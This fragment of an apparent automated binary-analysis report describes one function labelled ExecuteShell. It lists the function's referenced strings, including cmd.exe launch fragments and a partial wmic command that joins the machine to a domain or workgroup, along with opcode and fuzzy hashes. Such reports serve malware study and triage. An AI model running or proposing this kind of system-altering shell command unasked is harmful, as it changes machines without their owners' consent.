                                • API ID: ExecuteShell_rand
                                • String ID: && exit$/k $A$B$C$D$E$F$G$H$I$Information$It has been modified successfully!$J$K$L$M$N$O$P$Q$R$S$T$U$V$X$Z$cmd.exe$open$wmic computersystem where Name="%COMPUTERNAME%" call JoinDomainOrWorkgroup Name="
                                • API String ID: 1896964485-2690276116
                                • Opcode ID: 811ddf9e782262980362ce7164d2efbbdf5730906a940ffc24afd2e6e205af75
                                • Instruction ID: cb036a8d72366a6edcd4fafc81f260ed520eb514809b80d5e2b6a7ae744668f3
                                • Opcode Fuzzy Hash: 811ddf9e782262980362ce7164d2efbbdf5730906a940ffc24afd2e6e205af75
                                • Instruction Fuzzy Hash: F2E1AF712087818FD305CB28C884B1BBBE1BF95318F548A5DF4A59B3D2D779E805CB9A